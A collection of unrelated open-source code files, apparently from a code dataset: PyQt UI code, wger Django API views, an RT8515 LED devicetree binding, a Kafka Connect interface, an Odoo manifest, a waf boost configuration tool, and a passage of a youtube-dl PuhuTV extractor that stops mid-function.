        self.wPushButton = QtGui.QPushButton(self.groupBox)
        self.wPushButton.setObjectName(_fromUtf8("wPushButton"))
        self.gridLayout.addWidget(self.wPushButton, 3, 0, 1, 2)
        self.iPushButton = QtGui.QPushButton(self.groupBox)
        self.iPushButton.setObjectName(_fromUtf8("iPushButton"))
        self.gridLayout.addWidget(self.iPushButton, 3, 2, 1, 1)
        self.fPushButton = QtGui.QPushButton(self.groupBox)
        self.fPushButton.setObjectName(_fromUtf8("fPushButton"))
        self.gridLayout.addWidget(self.fPushButton, 4, 0, 1, 1)
        self.tPushButton = QtGui.QPushButton(self.groupBox)
        self.tPushButton.setObjectName(_fromUtf8("tPushButton"))
        self.gridLayout.addWidget(self.tPushButton, 4, 2, 1, 1)
        self.lPushButton = QtGui.QPushButton(self.groupBox)
        self.lPushButton.setObjectName(_fromUtf8("lPushButton"))
        self.gridLayout.addWidget(self.lPushButton, 5, 0, 1, 2)
        # 'Erase Chip' is disabled by default as a safety measure.
        self.zPushButton = QtGui.QPushButton(self.groupBox)
        self.zPushButton.setEnabled(False)
        self.zPushButton.setObjectName(_fromUtf8("zPushButton"))
        self.gridLayout.addWidget(self.zPushButton, 5, 2, 1, 1)
        self.cmdLineEdit = QtGui.QLineEdit(self.groupBox)
        self.cmdLineEdit.setObjectName(_fromUtf8("cmdLineEdit"))
        self.gridLayout.addWidget(self.cmdLineEdit, 6, 0, 1, 2)
        self.cmdSendPushButton = QtGui.QPushButton(self.groupBox)
        self.cmdSendPushButton.setObjectName(_fromUtf8("cmdSendPushButton"))
        self.gridLayout.addWidget(self.cmdSendPushButton, 6, 2, 1, 1)
        self.verticalLayout.addLayout(self.gridLayout)
        self.plainTextEdit = QtGui.QPlainTextEdit(self.groupBox)
        self.plainTextEdit.setAcceptDrops(False)
        self.plainTextEdit.setObjectName(_fromUtf8("plainTextEdit"))
        self.verticalLayout.addWidget(self.plainTextEdit)
        self.verticalLayout_3.addWidget(self.groupBox)
        self.tabWidget.addTab(self.tab_2, _fromUtf8(""))
        self.horizontalLayout.addWidget(self.tabWidget)
        MainWindow.setCentralWidget(self.centralwidget)
        self.menubar = QtGui.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 788, 22))
        self.menubar.setObjectName(_fromUtf8("menubar"))
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtGui.QStatusBar(MainWindow)
        self.statusbar.setObjectName(_fromUtf8("statusbar"))
        MainWindow.setStatusBar(self.statusbar)
        self.retranslateUi(MainWindow)
        self.tabWidget.setCurrentIndex(0)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)

    def retranslateUi(self, MainWindow):
        """Assign all user-visible (translatable) strings to the widgets."""
        MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow", None))
        self.label_3.setText(_translate("MainWindow", "Port", None))
        self.connectPushButton.setText(_translate("MainWindow", "Connect", None))
        self.label_2.setText(_translate("MainWindow", "Device", None))
        self.imageLabel.setText(_translate("MainWindow", "Image Preview", None))
        self.sendPushButton.setText(_translate("MainWindow", "Send to USB paper", None))
        self.saveXBMpushButton.setText(_translate("MainWindow", "Save image as XBM file", None))
        self.pushButtonAdd.setText(_translate("MainWindow", "Add file", None))
        self.pushButtonPaste.setText(_translate("MainWindow", "Paste", None))
        self.pushButtonRotate.setText(_translate("MainWindow", "Rotate", None))
        self.pushButtonPreview.setText(_translate("MainWindow", "Preview", None))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "Image", None))
        self.groupBox.setTitle(_translate("MainWindow", "Debug", None))
        self.sectorLabel.setText(_translate("MainWindow", "Target Sector", None))
        self.randomPushButton.setText(_translate("MainWindow", "Random", None))
        self.qdPushButton.setText(_translate("MainWindow", "Quick Dump", None))
        self.dPushButton.setText(_translate("MainWindow", "Dump Sector", None))
        self.uPushButton.setText(_translate("MainWindow", "Upload Image", None))
        self.ePushButton.setText(_translate("MainWindow", "Erase Sector", None))
        self.wPushButton.setText(_translate("MainWindow", "Clear Screen", None))
        self.iPushButton.setText(_translate("MainWindow", "Show Image", None))
        self.fPushButton.setText(_translate("MainWindow", "Flash info", None))
        self.tPushButton.setText(_translate("MainWindow", "Temprature", None))
        self.lPushButton.setText(_translate("MainWindow", "List non-empty Sectors", None))
        self.zPushButton.setText(_translate("MainWindow", "Erase Chip", None))
        self.cmdSendPushButton.setText(_translate("MainWindow", "Send", None))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Advanced", None))
from graphicsscene import GraphicsView | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
# This file is part of wger Workout Manager.
#
# wger Workout Manager is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# wger Workout Manager is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Workout Manager. If not, see <http://www.gnu.org/licenses/>.
from django.contrib.auth.models import User
from rest_framework import viewsets
from rest_framework.response import Response
from rest_framework.decorators import detail_route
from wger.core.models import (
UserProfile,
Language,
DaysOfWeek,
License,
RepetitionUnit,
WeightUnit)
from wger.core.api.serializers import (
UsernameSerializer,
LanguageSerializer,
DaysOfWeekSerializer,
LicenseSerializer,
RepetitionUnitSerializer,
WeightUnitSerializer
)
from wger.core.api.serializers import UserprofileSerializer
from wger.utils.permissions import UpdateOnlyPermission, WgerPermission
class UserProfileViewSet(viewsets.ModelViewSet):
    '''
    API endpoint for userprofile objects
    '''
    # Docstring fixed: it previously said "workout objects" (copy-paste).
    is_private = True
    serializer_class = UserprofileSerializer
    permission_classes = (WgerPermission, UpdateOnlyPermission)
    ordering_fields = '__all__'

    def get_queryset(self):
        '''
        Only allow access to appropriate objects
        '''
        # Users may only ever see their own profile.
        return UserProfile.objects.filter(user=self.request.user)

    def get_owner_objects(self):
        '''
        Return objects to check for ownership permission
        '''
        return [(User, 'user')]

    @detail_route()
    def username(self, request, pk):
        '''
        Return the username
        '''
        user = self.get_object().user
        return Response(UsernameSerializer(user).data)
class LanguageViewSet(viewsets.ReadOnlyModelViewSet):
    '''
    API endpoint for language objects
    '''
    # Docstring fixed: it previously said "workout objects" (copy-paste).
    queryset = Language.objects.all()
    serializer_class = LanguageSerializer
    ordering_fields = '__all__'
    filter_fields = ('full_name',
                     'short_name')
class DaysOfWeekViewSet(viewsets.ReadOnlyModelViewSet):
    '''
    API endpoint for days-of-week objects
    '''
    # Docstring fixed: it previously said "workout objects" (copy-paste).
    queryset = DaysOfWeek.objects.all()
    serializer_class = DaysOfWeekSerializer
    ordering_fields = '__all__'
    filter_fields = ('day_of_week', )
class LicenseViewSet(viewsets.ReadOnlyModelViewSet):
    '''
    API endpoint for license objects
    '''
    # Docstring fixed: it previously said "workout objects" (copy-paste).
    queryset = License.objects.all()
    serializer_class = LicenseSerializer
    ordering_fields = '__all__'
    filter_fields = ('full_name',
                     'short_name',
                     'url')
class RepetitionUnitViewSet(viewsets.ReadOnlyModelViewSet):
    '''
    Read-only API endpoint for repetition unit objects
    '''
    queryset = RepetitionUnit.objects.all()
    serializer_class = RepetitionUnitSerializer
    ordering_fields = '__all__'
    filter_fields = ('name', )
class WeightUnitViewSet(viewsets.ReadOnlyModelViewSet):
    '''
    Read-only API endpoint for weight unit objects
    '''
    queryset = WeightUnit.objects.all()
    serializer_class = WeightUnitSerializer
    ordering_fields = '__all__'
    filter_fields = ('name', )
# SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause)
%YAML 1.2
---
$id: http://devicetree.org/schemas/leds/richtek,rt8515.yaml#
$schema: http://devicetree.org/meta-schemas/core.yaml#
title: Richtek RT8515 1.5A dual channel LED driver
maintainers:
- Linus Walleij <linusw@kernel.org>
description: |
The Richtek RT8515 is a dual channel (two mode) LED driver that
supports driving a white LED in flash or torch mode. The maximum
current for each mode is defined in hardware using two resistors
RFS and RTS.
properties:
compatible:
const: richtek,rt8515
enf-gpios:
maxItems: 1
description: A connection to the 'ENF' (enable flash) pin.
ent-gpios:
maxItems: 1
description: A connection to the 'ENT' (enable torch) pin.
richtek,rfs-ohms:
minimum: 7680
maximum: 367000
description: The resistance value of the RFS resistor. This
resistor limits the maximum flash current. This must be set
for the property flash-max-microamp to work, the RFS resistor
defines the range of the dimmer setting (brightness) of the
flash LED.
richtek,rts-ohms:
minimum: 7680
maximum: 367000
description: The resistance value of the RTS resistor. This
resistor limits the maximum torch current. This must be set
for the property torch-max-microamp to work, the RTS resistor
defines the range of the dimmer setting (brightness) of the
torch LED.
led:
type: object
$ref: common.yaml#
properties:
function: true
color: true
flash-max-timeout-us: true
flash-max-microamp:
maximum: 700000
description: The maximum current for flash mode
is hardwired to the component using the RFS resistor to
ground. The maximum hardware current setting is calculated
according to the formula Imax = 5500 / RFS. The lowest
allowed resistance value is 7.86 kOhm giving an absolute
maximum current of 700mA. By setting this attribute in
the device tree, you can further restrict the maximum
current below the hardware limit. This requires the RFS
to be defined as it defines the maximum range.
led-max-microamp:
maximum: 700000
description: The maximum current for torch mode
is hardwired to the component using the RTS resistor to
ground. The maximum hardware current setting is calculated
according to the formula Imax = 5500 / RTS. The lowest
allowed resistance value is 7.86 kOhm giving an absolute
maximum current of 700mA. By setting this attribute in
the device tree, you can further restrict the maximum
current below the hardware limit. This requires the RTS
to be defined as it defines the maximum range.
additionalProperties: false
required:
- compatible
- ent-gpios
- enf-gpios
- led
additionalProperties: false
examples:
- |
#include <dt-bindings/gpio/gpio.h>
#include <dt-bindings/leds/common.h>
led-controller {
compatible = "richtek,rt8515";
enf-gpios = <&gpio4 12 GPIO_ACTIVE_HIGH>;
ent-gpios = <&gpio4 13 GPIO_ACTIVE_HIGH>;
richtek,rfs-ohms = <16000>;
richtek,rts-ohms = <100000>;
led {
function = LED_FUNCTION_FLASH;
color = <LED_COLOR_ID_WHITE>;
flash-max-timeout-us = <250000>;
flash-max-microamp = <150000>;
led-max-microamp = <25000>;
};
};
... | unknown | github | https://github.com/torvalds/linux | Documentation/devicetree/bindings/leds/richtek,rt8515.yaml |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.kafka.connect.transforms;
import org.apache.kafka.common.Configurable;
import org.apache.kafka.common.config.ConfigDef;
import org.apache.kafka.connect.connector.ConnectRecord;
import java.io.Closeable;
/**
* Single message transformation for Kafka Connect record types.
* <p>
* Connectors can be configured with transformations to make lightweight message-at-a-time modifications.
* <p>Kafka Connect may discover implementations of this interface using the Java {@link java.util.ServiceLoader} mechanism.
* To support this, implementations of this interface should also contain a service provider configuration file in
* {@code META-INF/services/org.apache.kafka.connect.transforms.Transformation}.
*
* <p>Implement {@link org.apache.kafka.common.metrics.Monitorable} to enable the transformation to register metrics.
* The following tags are automatically added to all metrics registered: <code>connector</code> set to connector name,
* <code>task</code> set to the task id and <code>transformation</code> set to the transformation alias.
*
* @param <R> The type of record (must be an implementation of {@link ConnectRecord})
*/
public interface Transformation<R extends ConnectRecord<R>> extends Configurable, Closeable {

    /**
     * Apply transformation to the {@code record} and return another record object (which may be {@code record} itself)
     * or {@code null}, corresponding to a map or filter operation respectively.
     * <p>
     * A transformation must not mutate objects reachable from the given {@code record}
     * (including, but not limited to, {@link org.apache.kafka.connect.header.Headers Headers},
     * {@link org.apache.kafka.connect.data.Struct Structs}, {@code Lists}, and {@code Maps}).
     * If such objects need to be changed, a new {@link ConnectRecord} should be created and returned.
     * <p>
     * The implementation must be thread-safe.
     *
     * @param record the record to be transformed; may not be null
     * @return the transformed record; may be null to indicate that the record should be dropped
     */
    R apply(R record);

    /** @return the configuration specification for this transformation; used to validate the connector's transform properties */
    ConfigDef config();

    /** Signal that this transformation instance will no longer be used; release any resources it holds. */
    @Override
    void close();
}
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# Odoo/OpenERP addon manifest: declares the "Issue Tracking" module
# (project_issue), its dependencies, data files, demo data and tests.
{
    'name': 'Issue Tracking',
    'version': '1.0',
    'category': 'Project Management',
    # Position in the apps list (lower = earlier)
    'sequence': 9,
    'summary': 'Support, Bug Tracker, Helpdesk',
    'description': """
Track Issues/Bugs Management for Projects
=========================================
This application allows you to manage the issues you might face in a project like bugs in a system, client complaints or material breakdowns.
It allows the manager to quickly check the issues, assign them and decide on their status quickly as they evolve.
""",
    'author': 'OpenERP SA',
    'website': 'https://www.odoo.com/page/project-management',
    # Modules that must be installed first
    'depends': [
        'sales_team',
        'project',
    ],
    # XML/CSV files loaded at (re)installation, in order
    'data': [
        'project_issue_view.xml',
        'project_issue_menu.xml',
        'report/project_issue_report_view.xml',
        'security/project_issue_security.xml',
        'security/ir.model.access.csv',
        'res_config_view.xml',
        'project_issue_data.xml'
    ],
    'demo': ['project_issue_demo.xml'],
    # Legacy YAML test scenarios
    'test': [
        'test/issue_users.yml',
        'test/subscribe_issue.yml',
        'test/issue_process.yml',
        'test/issue_demo.yml'
    ],
    'installable': True,
    'auto_install': False,
    # Shown as a standalone application in the apps menu
    'application': True,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
#! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
'''
This is an extra tool, not bundled with the default waf binary.
To add the boost tool to the waf file:
$ ./waf-light --tools=compat15,boost
or, if you have waf >= 1.6.2
$ ./waf update --files=boost
When using this tool, the wscript will look like:
def options(opt):
opt.load('compiler_cxx boost')
def configure(conf):
conf.load('compiler_cxx boost')
conf.check_boost(lib='system filesystem')
def build(bld):
bld(source='main.cpp', target='app', use='BOOST')
Options are generated, in order to specify the location of boost includes/libraries.
The `check_boost` configuration function allows to specify the used boost libraries.
It can also provide default arguments to the --boost-static and --boost-mt command-line arguments.
Everything will be packaged together in a BOOST component that you can use.
When using MSVC, a lot of compilation flags need to match your BOOST build configuration:
- you may have to add /EHsc to your CXXFLAGS or define boost::throw_exception if BOOST_NO_EXCEPTIONS is defined.
Errors: C4530
- boost libraries will try to be smart and use the (pretty but often not useful) auto-linking feature of MSVC
So before calling `conf.check_boost` you might want to disabling by adding:
conf.env.DEFINES_BOOST += ['BOOST_ALL_NO_LIB']
Errors:
- boost might also be compiled with /MT, which links the runtime statically.
If you have problems with redefined symbols,
self.env['DEFINES_%s' % var] += ['BOOST_ALL_NO_LIB']
self.env['CXXFLAGS_%s' % var] += ['/MD', '/EHsc']
Passing `--boost-linkage_autodetect` might help ensuring having a correct linkage in some basic cases.
'''
import sys
import re
from waflib import Utils,Logs,Errors
from waflib.Configure import conf
# Default locations probed for boost libraries and headers when the user
# does not pass --boost-libs / --boost-includes
BOOST_LIBS=['/usr/lib','/usr/local/lib','/opt/local/lib','/sw/lib','/lib']
BOOST_INCLUDES=['/usr/include','/usr/local/include','/opt/local/include','/sw/include']
# Header parsed to detect the installed boost version
BOOST_VERSION_FILE='boost/version.hpp'
# Fallback: compile and run this snippet to print BOOST_LIB_VERSION
BOOST_VERSION_CODE='''
#include <iostream>
#include <boost/version.hpp>
int main() { std::cout << BOOST_LIB_VERSION << std::endl; }
'''
PLATFORM=Utils.unversioned_sys_platform()
# Helpers mapping a compiler to the toolset tag embedded in boost library
# file names (platform-dependent for intel/clang/mingw)
detect_intel=lambda env:(PLATFORM=='win32')and'iw'or'il'
detect_clang=lambda env:(PLATFORM=='darwin')and'clang-darwin'or'clang'
detect_mingw=lambda env:(re.search('MinGW',env.CXX[0]))and'mgw'or'gcc'
# Compiler/platform name -> toolset tag (string) or detector callable
BOOST_TOOLSETS={'borland':'bcb','clang':detect_clang,'como':'como','cw':'cw','darwin':'xgcc','edg':'edg','g++':detect_mingw,'gcc':detect_mingw,'icpc':detect_intel,'intel':detect_intel,'kcc':'kcc','kylix':'bck','mipspro':'mp','mingw':'mgw','msvc':'vc','qcc':'qcc','sun':'sw','sunc++':'sw','tru64cxx':'tru','vacpp':'xlc'}
def options(opt):
    """
    Add the boost-related command-line options (--boost-includes,
    --boost-libs, --boost-static, --boost-mt, --boost-abi,
    --boost-linkage_autodetect, --boost-toolset, --boost-python)
    to the option parser.
    """
    opt.add_option('--boost-includes',type='string',default='',dest='boost_includes',help='''path to the boost includes root (~boost root)
e.g. /path/to/boost_1_47_0''')
    opt.add_option('--boost-libs',type='string',default='',dest='boost_libs',help='''path to the directory where the boost libs are
e.g. /path/to/boost_1_47_0/stage/lib''')
    opt.add_option('--boost-static',action='store_true',default=False,dest='boost_static',help='link with static boost libraries (.lib/.a)')
    opt.add_option('--boost-mt',action='store_true',default=False,dest='boost_mt',help='select multi-threaded libraries')
    opt.add_option('--boost-abi',type='string',default='',dest='boost_abi',help='''select libraries with tags (dgsyp, d for debug),
see doc Boost, Getting Started, chapter 6.1''')
    opt.add_option('--boost-linkage_autodetect',action="store_true",dest='boost_linkage_autodetect',help="auto-detect boost linkage options (don't get used to it / might break other stuff)")
    opt.add_option('--boost-toolset',type='string',default='',dest='boost_toolset',help='force a toolset e.g. msvc, vc90, \
gcc, mingw, mgw45 (default: auto)')
    # Default the boost_python suffix to the running interpreter's version
    py_version='%d%d'%(sys.version_info[0],sys.version_info[1])
    opt.add_option('--boost-python',type='string',default=py_version,dest='boost_python',help='select the lib python with this version \
(default: %s)'%py_version)
@conf
def __boost_get_version_file(self, dir):
    """
    Return the node for ``boost/version.hpp`` under *dir*, or None.

    :param dir: candidate boost include directory (string path)
    :returns: waf Node of the version header, or None when the directory
              or the header does not exist
    """
    try:
        return self.root.find_dir(dir).find_node(BOOST_VERSION_FILE)
    except (AttributeError, OSError):
        # find_dir() returns None for a missing directory, making the
        # chained find_node() call raise AttributeError.  Catch only the
        # expected failures instead of the original bare ``except:``,
        # which also swallowed KeyboardInterrupt/SystemExit.
        return None
@conf
def boost_get_version(self, dir):
    """
    Detect the boost version string (BOOST_LIB_VERSION, e.g. ``1_47``).

    First tries to parse ``boost/version.hpp`` found under *dir*; if the
    header is missing, unreadable or does not match, falls back to
    compiling and running a small test program.

    :param dir: boost include directory
    :returns: the version string
    """
    re_but = re.compile('^#define\\s+BOOST_LIB_VERSION\\s+"(.*)"$', re.M)
    try:
        val = re_but.search(self.__boost_get_version_file(dir).read()).group(1)
    except Exception:
        # Narrowed from the original bare ``except:`` so that
        # KeyboardInterrupt/SystemExit are no longer swallowed.  Any
        # parsing failure (no header -> AttributeError on None, read
        # errors, no regex match) triggers the compile-time fallback.
        val = self.check_cxx(fragment=BOOST_VERSION_CODE, includes=[dir], execute=False, define_ret=True)
    return val
@conf
def boost_get_includes(self, *k, **kw):
    """
    Return the directory containing the boost headers.

    Uses the ``includes`` keyword (or first positional argument) when it
    points at a directory holding boost/version.hpp; otherwise probes the
    well-known locations in BOOST_INCLUDES.  Aborts the configuration
    when nothing is found.
    """
    includes = k and k[0] or kw.get('includes', None)
    if includes and self.__boost_get_version_file(includes):
        return includes
    for dir in BOOST_INCLUDES:
        if self.__boost_get_version_file(dir):
            return dir
    # Nothing matched: give a hint that depends on whether a path was given
    if includes:
        self.fatal('headers not found in %s' % includes)
    else:
        self.fatal('headers not found, please provide a --boost-includes argument (see help)')
@conf
def boost_get_toolset(self, cc):
    """
    Map a compiler name to the toolset tag used in boost library names.

    :param cc: compiler name forced by the user (may be empty)
    :returns: the toolset tag string; unknown names are returned verbatim
    """
    key = cc
    if not key:
        # No explicit toolset: try the build platform first, then the
        # detected C++ compiler name.
        build_platform = Utils.unversioned_sys_platform()
        key = build_platform if build_platform in BOOST_TOOLSETS else self.env.CXX_NAME
    # Unknown keys fall back to the user-supplied value unchanged
    selected = BOOST_TOOLSETS.get(key, cc)
    # Entries may be plain strings or env-dependent detector callables
    return selected if isinstance(selected, str) else selected(self.env)
@conf
def __boost_get_libs_path(self, *k, **kw):
    """
    Return the boost library path and all the boost library files in it.

    Honors an explicit ``files`` list, then an explicit ``libs`` path,
    then probes the default locations in BOOST_LIBS (and their '64'
    variants).  Aborts the configuration when no boost libraries are
    found anywhere.
    """
    if 'files' in kw:
        # Caller supplied the file list directly; anchor at the fs root
        return self.root.find_dir('.'), Utils.to_list(kw['files'])
    libs = k and k[0] or kw.get('libs', None)
    if libs:
        path = self.root.find_dir(libs)
        files = path.ant_glob('*boost_*')
    if not libs or not files:
        for dir in BOOST_LIBS:
            try:
                path = self.root.find_dir(dir)
                files = path.ant_glob('*boost_*')
                if files:
                    break
                # Also try the 64-bit variant, e.g. /usr/lib64
                path = self.root.find_dir(dir + '64')
                files = path.ant_glob('*boost_*')
                if files:
                    break
            except:
                # Deliberate best-effort probing: a missing candidate
                # directory simply moves on to the next one
                path = None
    if not path:
        if libs:
            self.fatal('libs not found in %s' % libs)
        else:
            self.fatal('libs not found, please provide a --boost-libs argument (see help)')
    self.to_log('Found the boost path in %r with the libraries:' % path)
    for x in files:
        self.to_log('	%r' % x)
    return path, files
@conf
def boost_get_libs(self, *k, **kw):
    """
    Return the lib path and the required libs according to the parameters.

    Builds a series of regex patterns per requested library, from the
    most specific (toolset + tags + python suffix + version) down to the
    most generic, and keeps the first matching file name.  Aborts the
    configuration when a requested library cannot be found.
    """
    path, files = self.__boost_get_libs_path(**kw)
    # Optional name tags: multi-threading ('mt') and ABI tags (e.g. 'd')
    t = []
    if kw.get('mt', False):
        t.append('mt')
    if kw.get('abi', None):
        t.append(kw['abi'])
    tags = t and '(-%s)+' % '-'.join(t) or ''
    toolset = self.boost_get_toolset(kw.get('toolset', ''))
    # Toolset tag may carry a version suffix, e.g. '-vc90'
    toolset_pat = '(-%s[0-9]{0,3})+' % toolset
    version = '(-%s)+' % self.env.BOOST_VERSION

    def find_lib(re_lib, files):
        # First file whose name matches the compiled pattern, else None
        for file in files:
            if re_lib.search(file.name):
                self.to_log('Found boost lib %s' % file)
                return file
        return None

    def format_lib_name(name):
        # Strip the 'lib' prefix (except for msvc) and the extension
        if name.startswith('lib') and self.env.CC_NAME != 'msvc':
            name = name[3:]
        return name[:name.rfind('.')]

    libs = []
    for lib in Utils.to_list(k and k[0] or kw.get('lib', None)):
        # boost_python carries an interpreter-version suffix, e.g. '-py27'
        py = (lib == 'python') and '(-py%s)+' % kw['python'] or ''
        # Try patterns from most specific to most generic; keep the first hit
        for pattern in ['boost_%s%s%s%s%s' % (lib, toolset_pat, tags, py, version), 'boost_%s%s%s%s' % (lib, tags, py, version), 'boost_%s%s%s' % (lib, tags, version), 'boost_%s%s%s%s' % (lib, toolset_pat, tags, py), 'boost_%s%s%s' % (lib, tags, py), 'boost_%s%s' % (lib, tags)]:
            self.to_log('Trying pattern %s' % pattern)
            file = find_lib(re.compile(pattern), files)
            if file:
                libs.append(format_lib_name(file.name))
                break
        else:
            self.fatal('lib %s not found in %s' % (lib, path.abspath()))
    return path.abspath(), libs
@conf
def check_boost(self, *k, **kw):
    """
    Initialize boost: detect the includes, the version and (optionally)
    the libraries, storing the results under the given uselib variable
    (default ``BOOST``).

    Command-line options (--boost-*) override keyword arguments.  When
    ``linkage_autodetect`` is requested on msvc, try cxxflags
    combinations until a test program links.

    :raises: conf.fatal on any detection or linkage failure
    """
    if not self.env['CXX']:
        self.fatal('load a c++ compiler first, conf.load("compiler_cxx")')
    params = {'lib': k and k[0] or kw.get('lib', None)}
    # Merge --boost-* command-line options over the keyword arguments
    for key, value in self.options.__dict__.items():
        if not key.startswith('boost_'):
            continue
        key = key[len('boost_'):]
        params[key] = value and value or kw.get(key, '')
    var = kw.get('uselib_store', 'BOOST')
    self.start_msg('Checking boost includes')
    self.env['INCLUDES_%s' % var] = inc = self.boost_get_includes(**params)
    self.env.BOOST_VERSION = self.boost_get_version(inc)
    self.end_msg(self.env.BOOST_VERSION)
    if Logs.verbose:
        Logs.pprint('CYAN', '	path : %s' % self.env['INCLUDES_%s' % var])
    if not params['lib']:
        # Header-only usage: nothing more to detect
        return
    self.start_msg('Checking boost libs')
    suffix = params.get('static', None) and 'ST' or ''
    path, libs = self.boost_get_libs(**params)
    self.env['%sLIBPATH_%s' % (suffix, var)] = [path]
    self.env['%sLIB_%s' % (suffix, var)] = libs
    self.end_msg('ok')
    if Logs.verbose:
        Logs.pprint('CYAN', '	path : %s' % path)
        Logs.pprint('CYAN', '	libs : %s' % libs)

    def try_link():
        # Compile/link small probes for the libraries that need it
        if 'system' in params['lib']:
            self.check_cxx(fragment="\n".join(['#include <boost/system/error_code.hpp>', 'int main() { boost::system::error_code c; }', ]), use=var, execute=False,)
        if 'thread' in params['lib']:
            self.check_cxx(fragment="\n".join(['#include <boost/thread.hpp>', 'int main() { boost::thread t; }', ]), use=var, execute=False,)

    if params.get('linkage_autodetect', False):
        self.start_msg("Attempting to detect boost linkage flags")
        toolset = self.boost_get_toolset(kw.get('toolset', ''))
        if toolset in ['vc']:
            # Disable msvc auto-linking feature (#pragma comment(lib,...))
            self.env['DEFINES_%s' % var] += ['BOOST_ALL_NO_LIB']
            # No DLLs found next to the libs: link statically
            has_dlls = False
            for x in Utils.listdir(path):
                if x.endswith(self.env.cxxshlib_PATTERN % ''):
                    has_dlls = True
                    break
            if not has_dlls:
                self.env['STLIBPATH_%s' % var] = [path]
                self.env['STLIB_%s' % var] = libs
                del self.env['LIB_%s' % var]
                del self.env['LIBPATH_%s' % var]
            # Try candidate cxxflags combinations until one links
            for cxxflags in (['/MD', '/EHsc'], []):
                self.env.stash()
                self.env["CXXFLAGS_%s" % var] += cxxflags
                try:
                    try_link()
                    self.end_msg("ok: winning cxxflags combination: %s" % (self.env["CXXFLAGS_%s" % var]))
                    e = None
                    break
                except Errors.ConfigurationError as exc:
                    self.env.revert()
                    e = exc
            if e is not None:
                self.fatal("Could not auto-detect boost linking flags combination, you may report it to boost.py author", ex=e)
        else:
            self.fatal("Boost linkage flags auto-detection not implemented (needed ?) for this toolchain")
    else:
        self.start_msg('Checking for boost linkage')
        try:
            try_link()
        # Fixed: was the Python-2-only form ``except Errors.ConfigurationError ,e:``
        # (a SyntaxError on Python 3, and inconsistent with the ``as exc``
        # clause used above)
        except Errors.ConfigurationError:
            self.fatal("Could not link against boost libraries using supplied options")
        self.end_msg('ok')
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..compat import (
compat_HTTPError,
compat_str,
)
from ..utils import (
ExtractorError,
int_or_none,
float_or_none,
parse_resolution,
str_or_none,
try_get,
unified_timestamp,
url_or_none,
urljoin,
)
class PuhuTVIE(InfoExtractor):
    # Single-video "watch" pages, e.g. https://puhutv.com/sut-kardesler-izle
    _VALID_URL = r'https?://(?:www\.)?puhutv\.com/(?P<id>[^/?#&]+)-izle'
    IE_NAME = 'puhutv'
    _TESTS = [{
        # film
        'url': 'https://puhutv.com/sut-kardesler-izle',
        'md5': 'fbd8f2d8e7681f8bcd51b592475a6ae7',
        'info_dict': {
            'id': '5085',
            'display_id': 'sut-kardesler',
            'ext': 'mp4',
            'title': 'Süt Kardeşler',
            'description': 'md5:405fd024df916ca16731114eb18e511a',
            'thumbnail': r're:^https?://.*\.jpg$',
            'duration': 4832.44,
            'creator': 'Arzu Film',
            'timestamp': 1469778212,
            'upload_date': '20160729',
            'release_year': 1976,
            'view_count': int,
            'tags': ['Aile', 'Komedi', 'Klasikler'],
        },
    }, {
        # episode, geo restricted, bypassable with --geo-verification-proxy
        'url': 'https://puhutv.com/jet-sosyete-1-bolum-izle',
        'only_matching': True,
    }, {
        # 4k, with subtitles
        'url': 'https://puhutv.com/dip-1-bolum-izle',
        'only_matching': True,
    }]
    # Subtitle language display names used by the API -> ISO 639-1 codes
    _SUBTITLE_LANGS = {
        'English': 'en',
        'Deutsch': 'de',
        'عربى': 'ar'
    }

    def _real_extract(self, url):
        display_id = self._match_id(url)

        # Video metadata comes from the slug endpoint
        info = self._download_json(
            urljoin(url, '/api/slug/%s-izle' % display_id),
            display_id)['data']

        video_id = compat_str(info['id'])
        title = info.get('name') or info['title']['name']
        if info.get('display_name'):
            # e.g. episode label appended to the series title
            title = '%s %s' % (title, info.get('display_name'))

        # Media URLs come from the assets endpoint; HTTP 403 means the
        # content is geo restricted
        try:
            videos = self._download_json(
                'https://puhutv.com/api/assets/%s/videos' % video_id,
                display_id, 'Downloading video JSON',
                headers=self.geo_verification_headers())
        except ExtractorError as e:
            if isinstance(e.cause, compat_HTTPError) and e.cause.code == 403:
                self.raise_geo_restricted()
            raise

        formats = []
        for video in videos['data']['videos']:
            media_url = url_or_none(video.get('url'))
            if not media_url:
                continue
            playlist = video.get('is_playlist')
            # HLS master playlists expand into multiple formats
